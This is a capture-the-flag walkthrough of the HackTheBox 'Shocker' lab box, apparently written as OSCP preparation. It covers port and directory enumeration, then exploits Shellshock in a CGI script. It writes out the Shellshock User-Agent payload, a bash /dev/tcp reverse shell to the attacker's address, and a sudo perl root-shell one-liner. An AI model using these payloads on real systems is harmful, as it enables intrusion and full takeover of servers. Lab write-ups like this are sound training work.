Hackthebox Shocker walkthrough

Hackthebox Shocker Walkthrough (NO Metasploit) OSCP Prep

Box Details

OS: Linux

Exploitable service: Apache via shellshock attack

Difficulty: Easy

Estimated time: 1 hour

1. I first ran an Nmap scan to determine open port and running services.

For full scan: nmap -sC -sV -A 10.10.10.56 (this does default scripts scan, service version and a full scan that include OS discovery and traceroute)

I always enumerate further with an ALL port scan just not to miss any service

nmap -p- 10.10.10.56

though this takes a longer time but it saves you trauma if there are higher ports open.

Results from Nmap scans show that there are only 2 open ports

Port 80 Apache httpd 2.4.18 ((Ubuntu)) webserver and suggest Ubuntu

Port 2222 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

both ports suggest that this box is a linux OS preferably a variant of Ubuntu operating system

Enumeration

My spider sense tells me to start enumerating port 80 first, as i believe SSH service is less exploitable except via bruteforce or username and password enumeration

So i visit the webpage on http://10.10.10.56 and i am presented with an almost creepy looking like page with a bug image and a message “Don’t Bug Me!”

Next i inspect the source code of the web page to view links and get more info about the page. (Ctrl + u will do this)

It just a simple html page. Nothing helpful here to compromise the box.

Next is to perform a Directory bruteforcing to discover hidden web directories and files.

I will be using the tool gobuster for this

you can install via sudo apt-get install gobuster

or you can use other tools such as wfuzz, dirb, and dirbuster for this enumeration.

Run the command: # gobuster dir -u http://10.10.10.56 -w /usr/share/seclists/Discovery/Web-Content/common.txt

seclist wordlist is large wordlist compilation every pentester should have. Its available on github https://github.com/danielmiessler/SecLists and you can also install via apt.

The results from the directory bruteforce shows some interesting directories like /cgi-bin and /server-status. However, this were unaccessible via the web browser.

NOTE: one key lesson from this box is to always perform a second directory enumeration with extensions to look for files like .txt, .sh, .py, .html, .php, and .pl. This is very important.

I didn't perform a file discovery bruteforce with extensions but i did that on the /cgi-bin directory as i had a hunch this was related to shellshock upon seeing the directory.

a script file named user.sh was found in the /cgi-bin directory

access the file downloads the script and accessing it shows that its just an uptime script

Next step would be to check for shellshock vulnerability

This is vulnerability affects systems by giving malicious users the ability to send bash commands to the underlying operating systems its a very dangerous and easily exploitable vulnerability.

Burpsuite will be used to test this vulnerability.

Launch burpsuite, set up burpsuite proxy on your browser and open the script on your browser.

Remember to turn off intercept

now visit your proxy history and send the reqeuest to repeater

read more on testing for shellshock vulnerability https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/

https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf

https://blog.cloudflare.com/inside-shellshock/

shellshock vulnerability requires you to send malformed http requests containing a header “header: () { :; }; “

i crafted my header using the User-Agent header in a repeater request

GET /cgi-bin/user.sh HTTP/1.1

Host: 10.10.10.56

User-Agent:() { :;}; echo; /bin/bash -c whoami

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

This was my payload to check for the shellshock vulnerability using bash to run a whoami command.

User-Agent:() { :;}; echo; /bin/bash -c whoami

Bingo! I got a response back with the user details “shelly”

so i decided to test if i could ping my attacking machine as this would give verify the possibility of a bash reverse-shell command working . I also setup a TCPDUMP listner to catch ICMP request coming to my attacking machine

my ping command worked and this was a good thing that guaranteed the success of a bash reverse shell working .

Next i set a netcat listener to catch the reverse shell on my attacking machine on port 443.

nc -lvnp 443 (does the trick)

Then i modify my bash command on burpsuite to send a reverse shell

User-Agent:() { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.17/443 0>&1

This kept waiting, no response was recieved which suggested that the command/process was being executed on the server. So i checked my netcat lisnter i already got a shell as the user shelly.

Privilege Escalation

ran the sudo -l command to see if could run any programs with the root user permissions.

Good news i could run perl as root user without a password as NOPASSWD was set.

https://gtfobins.github.io/gtfobins/perl/#sudo is a great resourse for privilege linux privillege escalation via sudo and suid.

Running sudo perl -e 'exec "/bin/sh";'

and i got a root shell.

It was as simple as that and straight forward

I tried upgrading the root shell to bash, but all efforts failed as python wasnt installed on the victim.

Thanks for reading.

I'm a cyber security analyst who wants to be a Professional penetration tester. Currently working on getting my OSCP certification.